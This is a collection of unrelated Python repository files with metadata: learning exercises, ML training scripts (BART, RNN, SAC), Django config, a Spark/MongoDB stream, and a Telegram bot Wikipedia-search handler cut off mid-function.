616481b2e75063bd42b700b4baac1bdbbd6f92b1 | 1804187f39dd6004250933b35ba9ce24297f32a5 | /car_importclass.py | 860b39b3d9c08872ea8be65c07d26f6029ef9c66 | [] | no_license | xiaomengxiangjia/Python | ecd2e3e8576364f15482669cb75b52b8790543f5 | 7f52a33d7956068d26347cf34d35c953b945a635 | refs/heads/master | 2020-03-20T23:01:09.981928 | 2018-08-23T09:04:53 | 2018-08-27T05:46:38 | 137,825,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,242 | py | """一个可用于表示汽车的类"""
class Car():
"""一次模拟汽车的简单尝试"""
def __init__(self, make, model, year):
"""初始化描述汽车的属性"""
self.make = make
self.model = model
self.year = year
self.odometer_reading = 0
def get_descriptive_name(self):
"""返回整洁的描述性名称"""
long_name = str(self.year) + ' ' + self.make + ' ' + self.model
return long_name.title()
def read_odometer(self):
"""打印一条消息,指出汽车的里程"""
print("This car has " + str(self.odometer_reading) + " miles on it.")
def update_odometer(self, mileage):
"""
将里程表读数设置为指定的值
拒绝将里程表往回拨
"""
if mileage >= self.odometer_reading:
self.odometer_reading = mileage
else:
print("You can't roll back an odometer!")
def increment_odometer(self, miles):
"""将里程表读数增加指定的量"""
self.odometer_reading += miles
"""一组用于表示电动汽车的类"""
class Battery():
"""一次模拟电动汽车电瓶的简单尝试"""
def __init__(self, battery_size=60):
"""初始化电瓶的属性"""
self.battery_size = battery_size
def describe_battery(self):
"""打印一条描述电瓶容量的消息"""
print("This car has a " + str(self.battery_size) + "-kwh battery.")
def get_range(self):
"""打印一条描述电瓶续航里程的消息"""
range = 200
if self.battery_size == 70:
range = 240
elif self.battery_size == 85:
range = 270
message = "This car can go approximately " + str(range)
message += " miles on a full charge."
print(message)
class ElectricCar(Car):
"""模拟电动汽车的独特之处"""
def __init__(self, make, model, year):
"""
初始化父类的属性,再初始化电动汽车特有的属性
"""
super().__init__(make, model, year)
self.battery = Battery()
| [
"645334483@qq.com"
] | 645334483@qq.com |
276bccd4f16fb7b435ac61d0da296658d2a152fd | 97ae427ff84c9b0450ed709dc55e1cc0e1edc096 | /til/future_til/class_level_operators.py | 02723ea43b703bfd62523ad8737ad110b21d2a4e | [] | no_license | OaklandPeters/til | 9081ac8b968223f4c92b38cf20cda90c92966628 | 12a1f7623916709211686d7817b93c7ef4d532d2 | refs/heads/master | 2021-01-17T14:16:48.285244 | 2016-06-20T14:23:40 | 2016-06-20T14:23:40 | 51,449,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,586 | py | """
This has not been made into a TIL in til/python yet, because...
it does not work correctly atm.
However, I'm reasonably sure I can get it to work (since I've got type-level operatores to work in the past)
"""
#
# Class-level operators
#--------------------------
# Requires metaclasses
# To make this work with instance-level overrides is complicated
# ... I should look to the proper method lookup, as described here:
# https://blog.ionelmc.ro/2015/02/09/understanding-python-metaclasses/
#
# ... actually, I'm pretty sure I need to use something like my @pedanticmethod
# to make __mul__ work as both a classmethod and instancemethod
class OperatorMeta(type):
def __mul__(cls, other):
if hasattr(cls, '__mul__'):
return cls.__mul__(other)
else:
return type.__mul__(cls, other)
raise TypeError(str.format(
"unspported operand type(s) for *: '{0}' and '{1}'",
cls.__name__, type(other).__name__
))
class ThreeBase(metaclass=OperatorMeta):
base = 3
@classmethod
def __mul__(cls, value):
return cls.base * value
def __init__(self, base):
self.base = base
assert((ThreeBase * 5) == 15)
assert((ThreeBase(10) * 5) == 50 ) # WRONG. Still returns 15
# This does not work correctly, the problem being I forget how
# to make OperatorMeta.__mul__ proxy down to the instance level
# ... HOWEVER, if I look up the standard rules for method lookup,
# in relation to metaclasses (the standard metaclass being 'type')
# then that should show me what to do
| [
"oakland.peters@gmail.com"
] | oakland.peters@gmail.com |
c3183a64b60f82a2d1f1c7b82e11741403c960e7 | 64c9d1c676456da745d953b0f93b12b8c9478801 | /train_bart.py | ed9f8a0d3e86b748e3e4875d33cdfab99b927aa7 | [] | no_license | sen33/end-to-end-dialogue-system | 530508a18e9bee4a96f122e5cc48f4172d665175 | ddc88a9467093a014eadd28826e14a5afcbdda75 | refs/heads/master | 2023-05-12T23:41:13.151164 | 2021-06-04T08:30:51 | 2021-06-04T08:30:51 | 373,682,115 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,212 | py | from argparse import ArgumentParser
from tqdm import tqdm
from datasets import load_dataset, load_metric
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM, DataCollatorForSeq2Seq, Seq2SeqTrainingArguments, Seq2SeqTrainer
import numpy as np
def preprocess_function(examples):
inputs = [prefix + ex for ex in examples['source']]
targets = [ex for ex in examples['target']]
model_inputs = tokenizer(inputs, max_length=1024, truncation=True)
# Setup the tokenizer for targets
with tokenizer.as_target_tokenizer():
labels = tokenizer(targets)
model_inputs["labels"] = labels["input_ids"]
return model_inputs
def postprocess_text(preds, labels):
preds = [pred.strip() for pred in preds]
labels = [[label.strip()] for label in labels]
return preds, labels
def compute_metrics(eval_preds):
preds, labels = eval_preds
if isinstance(preds, tuple):
preds = preds[0]
decoded_preds = tokenizer.batch_decode(preds, skip_special_tokens=True)
# Replace -100 in the labels as we can't decode them.
labels = np.where(labels != -100, labels, tokenizer.pad_token_id)
decoded_labels = tokenizer.batch_decode(labels, skip_special_tokens=True)
# Some simple post-processing
decoded_preds, decoded_labels = postprocess_text(decoded_preds, decoded_labels)
result = metric.compute(predictions=decoded_preds, references=decoded_labels)
result = {"bleu": result["score"]}
prediction_lens = [np.count_nonzero(pred != tokenizer.pad_token_id) for pred in preds]
result["gen_len"] = np.mean(prediction_lens)
result = {k: round(v, 4) for k, v in result.items()}
return result
parser = ArgumentParser(description='Generate result in certain format.')
parser.add_argument("--model_checkpoint", type=str, help="Checkpoint name or directory", default = 'facebook/bart-base')
parser.add_argument("--batch_size", type=int, help="Batch size", default = 8)
parser.add_argument("--learning_rate", type=float, help="Learing rate", default = 1e-5)
parser.add_argument("--epoch", type=int, help="Epoch", default = 10)
parser.add_argument("--output_dir", type=str, help="Output directory", default = 'run/bart/0')
parser.add_argument("--type", type=str, help="Data type", default = '')
parser.add_argument("--max_input_length", type=int, help="Max input length", default = 512)
parser.add_argument("--max_target_length", type=int, help="Max target length", default = 128)
args = parser.parse_args()
raw_datasets = load_dataset('json', data_files={
'train': 'data/' + args.type + '/combined-train.json',
'test': 'data/' + args.type + '/combined-test.json',
'validation': 'data/' + args.type + '/combined-dev.json',
}, field = 'data')
metric = load_metric("sacrebleu")
tokenizer = AutoTokenizer.from_pretrained(args.model_checkpoint)
model = AutoModelForSeq2SeqLM.from_pretrained(args.model_checkpoint)
if args.type == 'with-kb':
ATTR_TO_SPECIAL_TOKEN = {'additional_special_tokens': ['<usr>', '<sys>', '<dta>']}
else:
ATTR_TO_SPECIAL_TOKEN = {'additional_special_tokens': ['<usr>', '<sys>']}
tokenizer.add_special_tokens(ATTR_TO_SPECIAL_TOKEN)
model.resize_token_embeddings(len(tokenizer))
if args.model_checkpoint in ["t5-small", "t5-base", "t5-larg", "t5-3b", "t5-11b"]:
prefix = "answer camrest question: "
else:
prefix = ""
print('PREFIX: ' + prefix)
tokenized_datasets = raw_datasets.map(preprocess_function, batched=True)
trainingArgs = Seq2SeqTrainingArguments(
output_dir=args.output_dir,
evaluation_strategy = "epoch",
learning_rate=args.learning_rate,
per_device_train_batch_size=args.batch_size,
per_device_eval_batch_size=args.batch_size,
weight_decay=0.01,
save_total_limit=1,
num_train_epochs=args.epoch,
predict_with_generate=True,
load_best_model_at_end=True,
metric_for_best_model='bleu',
)
data_collator = DataCollatorForSeq2Seq(tokenizer, model=model)
trainer = Seq2SeqTrainer(
model,
trainingArgs,
train_dataset=tokenized_datasets["train"],
eval_dataset=tokenized_datasets["validation"],
data_collator=data_collator,
tokenizer=tokenizer,
compute_metrics=compute_metrics,
)
trainer.train()
| [
"vinsen@xendit.co"
] | vinsen@xendit.co |
64ccd8c888140a26f57b18329d4f4f830cabc223 | 3c38bd0b7e22b2a579cfb7433ee908cb034ea298 | /fpo_mgmt/fpo_management/doctype/fpo_village/test_fpo_village.py | 8f037419b73d63a63b352567182c713ccbc8c22f | [
"MIT"
] | permissive | csaindia/fpo_erpnext | 97d2b1d6012a61df779298a5c3f2f314b3fe749e | bc92a4d8b63a57c50a84878ebe7ff37227c367eb | refs/heads/master | 2021-04-27T06:22:44.556058 | 2018-03-27T06:51:37 | 2018-03-27T06:51:37 | 122,613,121 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2018, Center for Sustainable Agriculture and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestFPOVillage(unittest.TestCase):
pass
| [
"sudhir.kothagunda@gmail.com"
] | sudhir.kothagunda@gmail.com |
9ec34fa7afffa2f1b30d4bc26ab78e65a475b4d9 | b156ae74bd7807369b931634eb4eac9849d75853 | /socketlis.py | 087ec998ad02c7492138c7627ae48d46bd52373c | [] | no_license | J0N35/Spark-Practice | 1864dac14b5f32cd3d281f2827c76f6e0e66bfce | 290681cbdcd4c84fed88cfdd6635767b7d238f4a | refs/heads/master | 2022-11-06T14:36:23.708782 | 2022-05-19T18:11:05 | 2022-05-19T18:11:05 | 59,737,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,566 | py |
# coding: utf-8
# In[ ]:
# example of spark stream
from pyspark import SparkContext, SparkConf
from pyspark.streaming import StreamingContext, StreamingListener
# initialize spark config
conf = SparkConf().setMaster('local[*]').setAppName('TweetCount')
# initialize spark context
sc = SparkContext(conf = conf)
# initialize sparkcontext object with batchDuration 60 seconds
ssc = StreamingContext(sparkContext = sc, batchDuration = 10)
# initialize DStream(textFileStream) for streaming
lines = ssc.socketTextStream('localhost',6666)
# Some work with DStream
# Split each line into words
# words = lines.flatMap(lambda line: line.split(" "))
# Count each word in each batch
# pairs = words.map(lambda word: (word, 1))
pairs = lines.map(lambda line: (line, 1))
wordCounts = pairs.reduceByKey(lambda x, y: x + y)
# Print the first ten elements of each RDD generated in this DStream to the console
wordCounts.pprint(num = 10) # debug use
# Test begin
# wordsCounts.saveToMongoDB('mongodb://192.168.11.201:32823/country')
def function(entry):
from pymongo import MongoClient
client = MongoClient('192.168.11.201', 32773)
db = client['twitter']
collection = db['country']
for item in entry.collect():
collection.find_one_and_update({'country':item[0]}, {'$inc':{'count':item[1]}}, upsert = True)
print('Done Batch')
wordCounts.foreachRDD(function)
# Test end
ssc.start() # Start the computation
ssc.awaitTermination() # Wait for the computation to terminate
| [
"r04921087@ntu.edu.tw"
] | r04921087@ntu.edu.tw |
96164464f24ee51181a36ffef0bb4a7a56bde3c5 | 7f227c62d25d09496dc5aabd9d58fc971c7c820d | /main.py | 4601d7ce2812480fd23ff394cffb3d3cee64b020 | [] | no_license | 0x15F9/ColabDemo | 6cd821ad6295cb30a656d506372882f14428adab | 093b374b4493146c787b48f46a6633bb1351fe20 | refs/heads/master | 2023-03-24T01:59:34.293793 | 2021-03-22T07:37:24 | 2021-03-22T07:37:24 | 350,248,808 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38 | py | for i in range(10):
print("Hello") | [
"isfaaqg@gmail.com"
] | isfaaqg@gmail.com |
a58811e0468e1f1caa16bc614773f6b9ff6b3b8e | 0ae31d72d267c5de55fc62040c2308a733efc109 | /RNN_Sin.py | 97a37d075e865ab399fbdfd8adb9ca9661672bdc | [] | no_license | laloceh/Torch_tests | c8188c636e09c260496c2d701f9f832de986f084 | cf13f8fa0031978b9966623ad86aa1cad45ccfea | refs/heads/master | 2022-09-07T23:02:12.932596 | 2020-05-29T22:12:59 | 2020-05-29T22:12:59 | 261,090,212 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,178 | py | import torch
from torch.autograd import Variable
import numpy as np
import pylab as pl
import torch.nn.init as init
import sys
dtype = torch.FloatTensor
input_size = 7
hidden_size = 6
output_size = 1
epochs = 300
seq_length = 20
lr = 0.1
data_time_steps = np.linspace(2, 10, seq_length+1)
data = np.sin(data_time_steps)
data.resize((seq_length+1), 1)
print(data)
print(len(data))
x = Variable(torch.Tensor(data[:-1]).type(dtype), requires_grad=False)
y = Variable(torch.Tensor(data[1:]).type(dtype), requires_grad=False)
print(x)
print(y)
w1 = torch.FloatTensor(input_size, hidden_size).type(dtype)
init.normal_(w1, 0.0, 0.4)
w1 = Variable(w1, requires_grad=True)
w2 = torch.FloatTensor(hidden_size, output_size).type(dtype)
init.normal_(w2, 0.0, 0.3)
w2 = Variable(w2, requires_grad=True)
def forward(input, context_state, w1, w2):
xh = torch.cat((input, context_state), 1)
context_state = torch.tanh(xh.mm(w1))
out = context_state.mm(w2)
return (out, context_state)
######### Training
for i in range(epochs):
total_loss = 0
context_state = Variable(torch.zeros((1, hidden_size)).type(dtype), requires_grad=True)
for j in range(x.size(0)):
input = x[j:(j+1)]
target = y[j:(j+1)]
(pred, context_state) = forward(input, context_state, w1, w2)
loss = (pred - target).pow(2).sum()/2
total_loss += loss
loss.backward()
w1.data -= lr * w1.grad.data
w2.data -= lr * w2.grad.data
w1.grad.data.zero_()
w2.grad.data.zero_()
context_state = Variable(context_state.data)
if i % 10 == 0:
print("Epoch: {} loss: {}".format(i, total_loss))
##### Predictions
context_state = Variable(torch.zeros( (1, hidden_size)).type(dtype), requires_grad=False )
predictions = []
for i in range(x.size(0)):
input = x[i:i+1]
(pred, context_state) = forward(input, context_state, w1, w2)
context_state = context_state
predictions.append(pred.data.numpy().ravel()[0])
print(predictions)
pl.scatter(data_time_steps[:-1], x.data.numpy(), s=90, label="Actual")
pl.scatter(data_time_steps[1:], predictions, label="Predicted")
pl.legend()
pl.show()
| [
"laloceh@hotmail.com"
] | laloceh@hotmail.com |
d8a4bb1467874a71d871c36cf87268c75bf2c1fa | a656125738208f60b997edd742ce62feb4dd8719 | /classes/migrations/0008_remove_classschedule_attended_members.py | d59d88f2b72c4e666a7eac8bf215f8015e939425 | [] | no_license | Mohsin0348/gym | 3c9fdb7cc70c1cbfcf63e6a26ad946e2549c2b69 | 602ece728c7dc8ba66c29df901d6e1e8d14b6040 | refs/heads/master | 2023-08-28T20:23:17.804831 | 2021-11-15T07:00:02 | 2021-11-15T07:00:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | # Generated by Django 3.2.8 on 2021-11-15 04:58
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('classes', '0007_alter_weekday_day'),
]
operations = [
migrations.RemoveField(
model_name='classschedule',
name='attended_members',
),
]
| [
"mohsin.mahbub.jim@gmail.com"
] | mohsin.mahbub.jim@gmail.com |
a2837fe0b71d24624074f3a1b846dbe016c02ce0 | 2c7d4bd9649d5ea4962148c3aebde37f3f9e667b | /config/settings.py | 5af70526b7793e13500fa01bcc9cd9a62cbcefc3 | [] | no_license | bigdata8000/blog-app | 071cbec1aaa76ff9509b7d84ecb0913cf11e68ce | c4b425d3e8dd720b0b30778eab75e4ce86b61dc3 | refs/heads/master | 2023-03-31T12:25:30.748507 | 2021-04-03T20:31:40 | 2021-04-03T20:31:40 | 354,388,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,247 | py | """
Django settings for config project.
Generated by 'django-admin startproject' using Django 3.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'dv!1b#+n&0go4kktak_5w!^7i)c4s0=!mo0)3%jtf444-y2^p)'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
'accounts',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [str(BASE_DIR.joinpath('templates'))],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [str(BASE_DIR.joinpath('static'))]
LOGIN_REDIRECT_URL = 'home'
LOGOUT_REDIRECT_URL = 'home'
| [
"bigdata8000@gmail.com"
] | bigdata8000@gmail.com |
1bbb189e92544af4163452162e9a38b09741f910 | b4e1848bb381db8e7c17935cfd7a05d4027efd77 | /bear/rlkit/torch/sac/sac_constant.py | 36e03f3b671dd73ed65c279215347280b6d03252 | [
"MIT",
"Apache-2.0"
] | permissive | junmokane/AI602_Project | 95c46d148bce391f0feb750da3583f16b8abf57e | 59c132ae04751f9fb6cf6ebb491042cbf4de003d | refs/heads/master | 2023-02-16T16:24:47.393118 | 2021-01-14T05:47:58 | 2021-01-14T05:47:58 | 303,891,598 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,074 | py | from collections import OrderedDict
import numpy as np
import torch
import torch.optim as optim
from torch import nn as nn
import rlkit.torch.pytorch_util as ptu
from rlkit.core.eval_util import create_stats_ordered_dict
from rlkit.torch.torch_rl_algorithm import TorchTrainer
from rlkit.torch.networks import FlattenMlp_Dropout
from uncertainty_modeling.rl_uncertainty.rank1.r1bnn import Model
from uncertainty_modeling.rl_uncertainty.model import RegNetBase, SWAG, RaPP, get_diffs
def unc_premodel(env, env_name, model_name):
path = './uncertainty_modeling/rl_uncertainty'
obs_dim = env.observation_space.low.size
action_dim = env.action_space.low.size
input_size = obs_dim + action_dim
model = None
if model_name == 'mc_dropout':
model = FlattenMlp_Dropout( # Check the dropout layer!
input_size=input_size,
output_size=1,
hidden_sizes=[256, 256],
).cuda()
if model_name == 'rank1':
model = Model(x_dim=input_size, h_dim=10, y_dim=1, n=10).cuda()
if model_name == 'rapp':
model = RaPP(input_size).cuda()
if model_name == 'swag':
kwargs = {"dimensions": [200, 50, 50, 50],
"output_dim": 1,
"input_dim": input_size}
args = list()
model = SWAG(RegNetBase, subspace_type="pca", *args, **kwargs,
subspace_kwargs={"max_rank": 10, "pca_rank": 10})
model.cuda()
if model == None:
raise AttributeError
else:
model.load_state_dict(torch.load('{}/{}/model/{}/model_1980.pt'.format(path, model_name, env_name)))
return model
def uncertainty(state, action, pre_model, pre_model_name):
with torch.no_grad():
if pre_model_name == 'rapp':
dif = get_diffs(torch.cat([state, action], dim=1), pre_model)
difs = torch.cat([torch.from_numpy(i) for i in dif], dim=-1).cuda()
dif = (difs ** 2).mean(axis=1)
'''
unc = beta / dif # B
unc = unc.unsqueeze(1) # Bx1
# TODO: clipping on uncertainty
# unc_critic = torch.clamp(unc, 0.0, 1.5)
unc_critic = unc
'''
unc_critic = dif
return unc_critic
else:
exit()
class SACTrainer(TorchTrainer):
def __init__(
self,
pre_model,
env_name,
env,
policy,
qf1,
qf2,
target_qf1,
target_qf2,
discount=0.99,
reward_scale=1.0,
policy_lr=1e-3,
qf_lr=1e-3,
optimizer_class=optim.Adam,
soft_target_tau=1e-2,
target_update_period=1,
plotter=None,
render_eval_paths=False,
use_automatic_entropy_tuning=True,
target_entropy=None,
policy_eval_start=0,
beta=1.0,
sub_q = 'mean',
):
super().__init__()
self.env = env
self.policy = policy
self.qf1 = qf1
self.qf2 = qf2
self.target_qf1 = target_qf1
self.target_qf2 = target_qf2
self.soft_target_tau = soft_target_tau
self.target_update_period = target_update_period
# variables for sac uncertainty
self._current_epoch = 0
self.policy_eval_start = policy_eval_start
self.beta = beta
self.use_automatic_entropy_tuning = use_automatic_entropy_tuning
if self.use_automatic_entropy_tuning:
if target_entropy:
self.target_entropy = target_entropy
else:
self.target_entropy = -np.prod(self.env.action_space.shape).item() # heuristic value from Tuomas
self.log_alpha = ptu.zeros(1, requires_grad=True)
self.alpha_optimizer = optimizer_class(
[self.log_alpha],
lr=policy_lr,
)
self.plotter = plotter
self.render_eval_paths = render_eval_paths
self.qf_criterion = nn.MSELoss()
self.vf_criterion = nn.MSELoss()
self.policy_optimizer = optimizer_class(
self.policy.parameters(),
lr=policy_lr,
)
self.qf1_optimizer = optimizer_class(
self.qf1.parameters(),
lr=qf_lr,
)
self.qf2_optimizer = optimizer_class(
self.qf2.parameters(),
lr=qf_lr,
)
self.discount = discount
self.reward_scale = reward_scale
self.eval_statistics = OrderedDict()
self._n_train_steps_total = 0
self._need_to_update_eval_statistics = True
self.discrete = False
self.pre_model_name = pre_model
self.pre_model = unc_premodel(self.env, env_name, pre_model)
self.dataset = env.get_dataset()
all_obs = torch.tensor(self.dataset['observations'])
all_act = torch.tensor(self.dataset['actions'])
self.min_obs = torch.min(all_obs)
self.max_obs = torch.max(all_obs)
self.min_act = torch.min(all_act)
self.max_act = torch.max(all_act)
all_obs, all_act = self.normalize_state_action(all_obs, all_act)
score = uncertainty(all_obs, all_act, self.pre_model, self.pre_model_name)
if sub_q == 'mean':
self.q_const = torch.mean(score)
elif sub_q == 'max':
self.q_const = torch.max(score)
else:
raise ValueError
def normalize_state_action(self, state, action):
state = (state - self.min_obs) / (self.max_obs - self.min_obs)
action = (action - self.min_act) / (self.max_act - self.min_act)
return state, action
return state, action
def train_from_torch(self, batch):
self._current_epoch += 1
rewards = batch['rewards']
terminals = batch['terminals']
obs = batch['observations']
actions = batch['actions']
next_obs = batch['next_observations']
"""
Policy and Alpha Loss and Beta Uncertainty Loss
"""
new_obs_actions, policy_mean, policy_log_std, log_pi, *_ = self.policy(
obs, reparameterize=True, return_log_prob=True,
)
if self.use_automatic_entropy_tuning:
alpha_loss = -(self.log_alpha * (log_pi + self.target_entropy).detach()).mean()
self.alpha_optimizer.zero_grad()
alpha_loss.backward()
self.alpha_optimizer.step()
alpha = self.log_alpha.exp()
else:
alpha_loss = 0
alpha = 1
q_new_actions = torch.min(
self.qf1(obs, new_obs_actions),
self.qf2(obs, new_obs_actions),
)
# policy uncertainty
policy_unc = self.q_const
policy_loss = (alpha * log_pi - (q_new_actions - self.beta * policy_unc)).mean()
if self._current_epoch < self.policy_eval_start:
policy_log_prob = self.policy.log_prob(obs, actions)
policy_loss = (alpha * log_pi - policy_log_prob).mean()
"""
QF Loss and Beta Uncertainty Loss
"""
q1_pred = self.qf1(obs, actions)
q2_pred = self.qf2(obs, actions)
# Make sure policy accounts for squashing functions like tanh correctly!
new_next_actions, _, _, new_log_pi, *_ = self.policy(
next_obs, reparameterize=True, return_log_prob=True,
)
target_q_values = torch.min(
self.target_qf1(next_obs, new_next_actions),
self.target_qf2(next_obs, new_next_actions),
) - alpha * new_log_pi
# critic uncertainty
critic_unc = self.q_const
target_q_values = target_q_values - self.beta * critic_unc
q_target = self.reward_scale * rewards + (1. - terminals) * self.discount * target_q_values
qf1_loss = self.qf_criterion(q1_pred, q_target.detach())
qf2_loss = self.qf_criterion(q2_pred, q_target.detach())
"""
Update networks
"""
self.qf1_optimizer.zero_grad()
qf1_loss.backward()
self.qf1_optimizer.step()
self.qf2_optimizer.zero_grad()
qf2_loss.backward()
self.qf2_optimizer.step()
self.policy_optimizer.zero_grad()
policy_loss.backward()
self.policy_optimizer.step()
"""
Soft Updates
"""
if self._n_train_steps_total % self.target_update_period == 0:
ptu.soft_update_from_to(
self.qf1, self.target_qf1, self.soft_target_tau
)
ptu.soft_update_from_to(
self.qf2, self.target_qf2, self.soft_target_tau
)
"""
Save some statistics for eval
"""
if self._need_to_update_eval_statistics:
self._need_to_update_eval_statistics = False
"""
Eval should set this to None.
This way, these statistics are only computed for one batch.
"""
policy_loss = (log_pi - q_new_actions).mean()
self.eval_statistics['QF1 Loss'] = np.mean(ptu.get_numpy(qf1_loss))
self.eval_statistics['QF2 Loss'] = np.mean(ptu.get_numpy(qf2_loss))
self.eval_statistics['Policy Loss'] = np.mean(ptu.get_numpy(
policy_loss
))
self.eval_statistics.update(create_stats_ordered_dict(
'Q1 Predictions',
ptu.get_numpy(q1_pred),
))
self.eval_statistics.update(create_stats_ordered_dict(
'Q2 Predictions',
ptu.get_numpy(q2_pred),
))
self.eval_statistics.update(create_stats_ordered_dict(
'Q Targets',
ptu.get_numpy(q_target),
))
self.eval_statistics.update(create_stats_ordered_dict(
'Log Pis',
ptu.get_numpy(log_pi),
))
self.eval_statistics.update(create_stats_ordered_dict(
'Policy mu',
ptu.get_numpy(policy_mean),
))
self.eval_statistics.update(create_stats_ordered_dict(
'Policy log std',
ptu.get_numpy(policy_log_std),
))
if self.use_automatic_entropy_tuning:
self.eval_statistics['Alpha'] = alpha.item()
self.eval_statistics['Alpha Loss'] = alpha_loss.item()
self._n_train_steps_total += 1
def get_diagnostics(self):
return self.eval_statistics
def end_epoch(self, epoch):
self._need_to_update_eval_statistics = True
@property
def networks(self):
return [
self.policy,
self.qf1,
self.qf2,
self.target_qf1,
self.target_qf2,
]
def get_snapshot(self):
return dict(
policy=self.policy,
qf1=self.qf1,
qf2=self.qf2,
target_qf1=self.qf1,
target_qf2=self.qf2,
)
| [
"scey26@naver.com"
] | scey26@naver.com |
b0e3a882a9cb2bf2f6a1e29d61545ed83bc64a05 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02882/s441562654.py | 2251e4e406faa3b13c7d32923f7711a41c800a0e | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | a, b, x = map(int, input().split())
if x > (a**2)*b/2:
t = 2*((a**2)*b-x)/(a**3)
else:
t = a*(b**2)/(2*x)
import math
ans = math.degrees(math.atan(t))
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
f13e05ee13f0f5939d2653f4b9b687685605c95d | 81f5103fe389e6172b79abb257df2f54bfa2e4ea | /handlers/users/searches/wikipedia.py | b54eeb86b1306c498238e18913caa60529185a5c | [] | no_license | DobbiKov/google-wiki-bot | 53f6ddebfc508203f31d888576506ce6b3f481c6 | f5634491f2c369b252d727f4f4834ff994e1d911 | refs/heads/master | 2023-08-01T14:21:29.516057 | 2021-09-14T20:28:39 | 2021-09-14T20:28:39 | 406,419,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,882 | py | from logging import log
from typing import Text
from aiogram import types
from aiogram.dispatcher import FSMContext
from aiogram.types import user
from aiogram.types.message import Message
from environs import LogLevelField
from states.search_state import Search
from keyboards.inline.start_inline import start_inline
from utils.search.search import search as utilsearch
from utils.wikipedia import wikipediaSearch
from utils.consts import CALLBACK_DATA_SEARCH_GOOGLE, CALLBACK_DATA_SEARCH_WIKIPEDIA, CALLBACK_DATA_TRANSLATE_EN, CALLBACK_DATA_TRANSLATE_RU, CLOSE_INLINE_MESSAGE
from loader import dp, bot
from data.config import ADMINS
@dp.callback_query_handler(lambda c: c.data == CALLBACK_DATA_SEARCH_WIKIPEDIA)
async def choose_search(call: types.CallbackQuery, state: FSMContext):
try:
data = await state.get_data()
text = "null"
text = data.get("search")
markup3 = types.InlineKeyboardMarkup()
if(text != "null"):
[text, markup3] = await bot_choose_search(call, state, text)
else:
text = "Error!"
# print(text)
await bot.send_message(call.from_user.id, text, reply_markup=markup3)
except Exception as ex:
print(ex)
await bot.send_message(call.from_user.id, f"Технические неполадки, приносим свои извинения.")
for admin in ADMINS:
await bot.send_message(admin, f"У пользователя {call.from_user.full_name} произошла ошибка при поиске!")
await bot.delete_message(call.message.chat.id, call.message.message_id)
async def bot_choose_search(call: types.CallbackQuery, state: FSMContext, text: str):
markup3 = types.InlineKeyboardMarkup()
arr = wikipediaSearch.search("ru", text)
if arr[0] == []:
text = "Вариантов ответа по вашему запросу не найдено!"
else:
text = "Варианты ответа по вашему запросу:"
wikipediaSearches = arr[0]
steps = 0
for i in arr[0]:
if i == "":
continue
try:
